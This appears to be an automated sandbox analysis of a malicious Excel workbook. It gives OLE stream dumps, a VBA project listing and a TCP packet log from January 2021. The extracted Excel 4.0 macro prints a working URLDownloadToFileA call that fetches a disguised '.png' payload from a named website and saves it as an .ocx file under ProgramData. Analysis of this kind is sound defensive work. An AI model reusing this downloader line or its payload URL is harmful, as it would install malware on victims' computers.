Data Raw: | 20 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 00 02 14 00 60 01 01 80 00 00 00 00 03 02 00 00 28 01 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 d8 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 1c |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 154550 |
Entropy: | 7.98610242414 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . . 6 > c d } . @ { . . . < 9 . ` - . . . . " . < . * . . 6 2 \\ . . . . . [ . . . . P . ( . . . . . . . . . . . . . t . . . . . \\ . p . . . ! . . . . . . . . . . { . $ 8 . . . . . . . . . ) . . 4 . | v U . [ < . t . . m . . 8 . . 4 . . . . ) 8 . o . P . . . . . N > . . . . . f . . . . . . . . . . . > . . / . . . ( / . . _ . $ F o . . l . . . . . . j h . . B . . . . . a . . . . . . . . . = . . . . . . . S . . . . . . . . . . . . . W . . . . . . t |
Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 92 95 36 3e 63 64 7d ad 40 7b f5 0a f4 3c 39 e8 60 2d b6 bc c7 d7 22 ab 3c c4 2a 9a 0f 36 32 5c 19 f5 e4 05 cb 5b bc 99 cb 9a 50 d8 28 8c eb 19 e1 00 02 00 b0 04 c1 00 02 00 74 f3 e2 00 00 00 5c 00 70 00 df 94 21 f2 c1 f7 f6 ae 8e e7 8c 02 fd 7b db 24 38 d5 a3 8a b0 a5 02 f8 06 ce 29 af e8 34 |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECT |
File Type: | ISO-8859 text, with CRLF line terminators |
Stream Size: | 387 |
Entropy: | 5.00967281416 |
Base64 Encoded: | True |
Data ASCII: | I D = " { C 4 7 7 9 5 8 8 - 7 8 B C - 4 0 2 C - 9 C 2 8 - 3 4 8 E A A E D 9 5 6 B } " . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 5 6 9 E 5 A 9 E 5 A 9 E 5 A 9 E 5 A " . . D P B = " 5 3 5 1 A 4 F A 5 7 F B 5 7 F B 5 7 " . . G C = " 0 5 0 7 F 2 4 C 1 6 F F 1 7 F F 1 7 0 0 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 |
Data Raw: | 49 44 3d 22 7b 43 34 37 37 39 35 38 38 2d 37 38 42 43 2d 34 30 32 43 2d 39 43 32 38 2d 33 34 38 45 41 41 45 44 39 35 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
File Type: | data |
Stream Size: | 20 |
Entropy: | 3.04643934467 |
Base64 Encoded: | False |
Data ASCII: | . . . . 1 . . . 8 . A . B . 1 . . . . . |
Data Raw: | cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2767 |
Entropy: | 3.97981669814 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . |
Data Raw: | cc 61 a3 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 728 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
File Type: | data |
Stream Size: | 728 |
Entropy: | 6.37265666305 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ) 3 . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 d4 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 29 33 e3 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Stream Path: _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1127 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901 |
File Type: | data |
Stream Size: | 1127 |
Entropy: | 3.56364076858 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . $ . . . . . . . 8 . . . . . . . . . . . . . . . H . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . L i s t B o x 1 , 2 , 0 , M S F o r m s , L i s t B o x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . |
Data Raw: | 01 16 01 00 00 14 01 00 00 18 03 00 00 f8 00 00 00 24 02 00 00 ff ff ff ff 38 03 00 00 8c 03 00 00 00 00 00 00 01 00 00 00 48 1c e9 9f 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Macro 4.0 Code |
---|
CALL("URLMon", "URLDownloadToFileA", "JJCCJJ", 0, ="https://www.penrithdentalimplants.com.au/ls/apperolew.png", C:\ProgramData\activex.ocx, 0, 0)
"=""https://www.penrithdentalimplants.com.au/ls/apperolew.png""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:07.085342884 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.273987055 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.274081945 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.283557892 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.471865892 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479675055 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479729891 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479768038 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.480004072 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.514084101 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.707853079 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.707982063 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:08.878242970 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.106628895 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276684999 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276724100 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276753902 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276793003 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276828051 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276865005 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276901007 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276920080 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.276947975 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276989937 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.276989937 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277025938 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277029037 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277034998 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277065992 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277079105 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277086020 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277105093 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277134895 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277139902 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277168989 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277173042 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277200937 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277214050 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277235031 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277260065 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277267933 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277301073 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277314901 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277337074 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277348042 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277374029 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277399063 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277420998 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277442932 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277478933 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277504921 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277524948 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277530909 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277565002 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277575970 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277601004 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277602911 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277638912 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277654886 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277667046 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277686119 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277703047 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277714014 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277740002 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277741909 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277776957 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277795076 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277823925 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277822971 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277863979 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277899981 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277915001 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277936935 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277947903 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277973890 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277973890 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278009892 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278026104 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278047085 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278078079 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278084040 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278110027 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278131008 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278137922 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278162956 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278196096 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278198957 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278227091 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278235912 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278249979 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278273106 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278283119 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278307915 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278326035 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278356075 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.283272028 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.466720104 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466777086 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466815948 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466854095 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466901064 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466943979 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466952085 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.466979980 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467000961 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467010021 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467037916 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467047930 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467080116 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467094898 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467108965 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467139959 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467149973 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467176914 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467196941 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467214108 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467223883 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467251062 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467256069 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467286110 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467302084 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.467323065 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.467333078 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
